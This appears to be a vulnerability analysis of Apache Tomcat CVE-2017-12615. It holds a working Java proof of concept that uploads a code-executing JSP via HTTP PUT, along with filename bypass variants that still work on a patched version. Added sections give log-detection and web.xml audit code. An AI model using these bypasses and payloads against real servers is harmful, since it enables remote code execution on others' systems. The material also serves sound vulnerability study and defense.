Apache Tomcat cve-2017-12615 Remote Code Execution Vulnerability Analysis

Source: Internet
Author: User
Tags: apache, tomcat, cve

On September 19, 2017, Apache Tomcat officially disclosed two serious security vulnerabilities. One of them, cve-2017-12615, is a remote code execution vulnerability: an attacker uploads a malicious JSP file to the server with an HTTP PUT request and then executes arbitrary code on the server by requesting that JSP file. The latest patch does not completely fix the vulnerability. Beijing will continue to track this vulnerability and update the relevant vulnerability information promptly.

Vulnerability number

cve-2017-12615

Vulnerability Name

Apache Tomcat Remote Code Execution vulnerability

Vulnerability Rating

Serious

Impact Range

Apache Tomcat 7.0.0-7.0.79

Vulnerability Analysis

1. Setting up a debugging environment

Download the Tomcat 7.0.79 source code: http://archive.apache.org/dist/tomcat/tomcat-7/v7.0.79/src/apache-tomcat-7.0.79-src.zip
After unpacking, create a pom.xml file in the root directory of the unpacked source and add the following:

<?xml version="1.0" encoding="UTF-8"?>
<!--suppress ALL -->
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>Tomcat7.0.79</artifactId>
    <name>tomcat7.0.79 src</name>
    <version>7.0.79</version>
    ...
</project>

Modify conf/web.xml and add the following init-param to the default servlet (this makes the DefaultServlet accept PUT requests):

<init-param>
    <param-name>readonly</param-name>
    <param-value>false</param-value>
</init-param>

Open the pom.xml file in IDEA.
The startup items are configured as follows:

2. Nothing appended after .jsp

package com.zxsoft;

import java.io.OutputStream;
import java.net.Socket;

public class TomcatExp {
    public static void main(String[] args) throws Exception {
        // Raw socket so that the request line can be controlled byte for byte
        Socket s = new Socket("localhost", 8080);
        OutputStream out = s.getOutputStream();
        // JSP body that is written to the server and runs when the page is requested
        String spayload = "<%Process proc = Runtime.getRuntime().exec(\"calc\");%>";
        // payload1: plain PUT of 1.jsp with nothing appended to the file name
        String head = "PUT /upload/" + "1.jsp" + " HTTP/1.1\r\n" + "Host: " + "localhost:8080" + "\r\n"
                + "Connection: keep-alive\r\n" + "Accept: text/html,application/xhtml+xml,application/xml,*/*\r\n"
                + "Accept-Encoding: gzip, deflate\r\n" + "Accept-Language: zh-cn\r\n" + "Content-Length: "
                + spayload.length() + "\r\n" + "\r\n";
        out.write(head.getBytes());
        out.write(spayload.getBytes(), 0, spayload.length());
        s.close();
    }
}

The request matches the *.jsp mapping and is handled by JspServlet, which cannot create the file.

3. Append \ after .jsp

String head = "PUT /upload/" + "1.jsp%7c" + " HTTP/1.1\r\n" + "Host: " + "localhost:8080" + "\r\n"

The request now enters DefaultServlet.

The readonly parameter is checked.

The file is written.

An exception is raised reporting a syntax error.

4. Append a space after .jsp

String head = "PUT /upload/" + "1.jsp%20" + " HTTP/1.1\r\n" + "Host: " + "localhost:8080" + "\r\n"

The request enters DefaultServlet.
The file is created successfully.

Appending a . (dot) behaves the same way.

5. Append ::$DATA after .jsp

String head = "PUT /upload/" + "1.jsp::$DATA" + " HTTP/1.1\r\n" + "Host: " + "localhost:8080" + "\r\n"

The request enters DefaultServlet.
The file is created successfully.

6. Append / after .jsp

String head = "PUT /upload/" + "1.jsp/" + " HTTP/1.1\r\n" + "Host: " + "localhost:8080" + "\r\n"

The trailing / is stripped and the file is still created successfully.

7. Version 7.0.81

Trailing space: canPath and absPath no longer match, so null is returned. Fixed.

::$DATA: canPath is empty. Fixed.

Trailing /: the file is still created successfully. The vulnerability is not fixed.
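The analysis above shows that every bypass variant (trailing space, dot, ::$DATA, /) is a decoration on the request path that Tomcat strips before writing the file. A defender can apply the same normalization to the access log and flag PUT requests whose effective target is a .jsp file. The following is an added example (not code from the original article); the log lines are constructed to mirror the requests described above, and the regular expression assumes Tomcat's default "common" access log format.

```python
import re
from urllib.parse import unquote

# Constructed sample access log lines (not from the article), in the format
# Tomcat's AccessLogValve writes by default. Each PUT mirrors one variant
# from the analysis; the 405 line is the plain PUT that JspServlet rejects.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Sep/2017:10:01:02 +0000] "PUT /upload/1.jsp/ HTTP/1.1" 201 0
10.0.0.5 - - [19/Sep/2017:10:01:03 +0000] "PUT /upload/1.jsp%20 HTTP/1.1" 201 0
10.0.0.5 - - [19/Sep/2017:10:01:04 +0000] "PUT /upload/1.jsp::$DATA HTTP/1.1" 201 0
10.0.0.5 - - [19/Sep/2017:10:01:05 +0000] "PUT /upload/1.jsp HTTP/1.1" 405 0
10.0.0.6 - - [19/Sep/2017:10:02:00 +0000] "GET /upload/1.jsp HTTP/1.1" 200 17
10.0.0.7 - - [19/Sep/2017:10:03:00 +0000] "PUT /api/report.json HTTP/1.1" 204 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Trailing decorations the article shows being dropped before the file is
# written, which is what lets the name end in .jsp without hitting JspServlet.
TRAILING_SUFFIXES = ("/", " ", ".", "::$DATA")


def effective_name(raw_path):
    """Decode the request path and strip trailing decorations until none remain.

    Returns the name the file would actually be written under.
    """
    path = unquote(raw_path.split("?", 1)[0])
    changed = True
    while changed:
        changed = False
        for suffix in TRAILING_SUFFIXES:
            if path.endswith(suffix) and len(path) > len(suffix):
                path = path[: -len(suffix)]
                changed = True
    return path


def is_suspicious_put(line):
    """Return a finding dict for a PUT whose effective target is a .jsp, else None."""
    match = LOG_RE.match(line)
    if not match or match.group("method") != "PUT":
        return None
    raw = match.group("path")
    name = effective_name(raw)
    if not name.lower().endswith(".jsp"):
        return None
    status = int(match.group("status"))
    return {
        "ip": match.group("ip"),
        "raw_path": raw,
        "effective_name": name,
        # A decorated name means the request was shaped to avoid JspServlet
        "bypass": unquote(raw) != name,
        # 2xx on a PUT means the DefaultServlet accepted and stored the body
        "written": 200 <= status < 300,
    }


def scan(log_text):
    """Run the check over every line and return the findings in log order."""
    return [hit for hit in (is_suspicious_put(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The `written` flag is the one to alert on: a 2xx response to a PUT that resolves to a .jsp means a server-side script now exists at that path, so the follow-up GET in the log should be treated as execution rather than as a page view.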

Exploitation

Requesting the uploaded JSP file executes the code successfully.

Fix suggestions

Set the readonly init-param of the DefaultServlet in conf/web.xml to true (or remove it, since true is the default).
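An audit of conf/web.xml is a quick way to confirm the fix across a fleet. The check below is an added example, not Tomcat's code; the web.xml fragments are constructed to resemble the default servlet declaration but are not the file Tomcat ships. It reproduces the DefaultServlet's reading of the parameter as far as I know it: an absent readonly parameter means true, and a present one is parsed with Boolean.parseBoolean semantics, so only the literal word true (in any case) keeps the servlet read-only.

```python
import xml.etree.ElementTree as ET

DEFAULT_SERVLET_CLASS = "org.apache.catalina.servlets.DefaultServlet"


def _web_xml(readonly_param):
    """Build a constructed conf/web.xml (not Tomcat's shipped file).

    readonly_param is the value of the readonly init-param, or None to omit it.
    """
    param = "" if readonly_param is None else (
        "<init-param><param-name>readonly</param-name>"
        f"<param-value>{readonly_param}</param-value></init-param>"
    )
    return f"""<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>{DEFAULT_SERVLET_CLASS}</servlet-class>
    <init-param><param-name>debug</param-name><param-value>0</param-value></init-param>
    {param}
    <load-on-startup>1</load-on-startup>
  </servlet>
  <servlet>
    <servlet-name>jsp</servlet-name>
    <servlet-class>org.apache.jasper.servlet.JspServlet</servlet-class>
  </servlet>
</web-app>"""


WEAK_WEB_XML = _web_xml("false")      # the debugging setup from the article
HARDENED_WEB_XML = _web_xml("true")   # the recommended fix
DEFAULT_WEB_XML = _web_xml(None)      # parameter absent: Tomcat defaults to true


def _local(tag):
    """Drop the XML namespace so the check works whatever xmlns the file declares."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name):
    """Text of the first direct child with the given local tag name, or None."""
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return None


def default_servlet_readonly(web_xml_text):
    """Return True if the DefaultServlet rejects PUT/DELETE, False if it accepts
    them, or None if no DefaultServlet is declared in the given web.xml."""
    root = ET.fromstring(web_xml_text)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        if _child_text(servlet, "servlet-class") != DEFAULT_SERVLET_CLASS:
            continue
        for init_param in servlet:
            if _local(init_param.tag) != "init-param":
                continue
            if _child_text(init_param, "param-name") == "readonly":
                value = _child_text(init_param, "param-value") or ""
                # Boolean.parseBoolean: only "true" (case-insensitive) is true, so a
                # typo such as "ture" silently leaves the servlet writable.
                return value.lower() == "true"
        return True  # readonly not declared: Tomcat's default is true
    return None


if __name__ == "__main__":
    for label, text in (("weak", WEAK_WEB_XML), ("hardened", HARDENED_WEB_XML), ("default", DEFAULT_WEB_XML)):
        print(label, "readonly =", default_servlet_readonly(text))
```

Run it against the real conf/web.xml by reading the file into `default_servlet_readonly`; a result of False is the misconfiguration this article depends on, and None means the servlet is declared somewhere else (for example in a per-application WEB-INF/web.xml), which should then be checked too.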
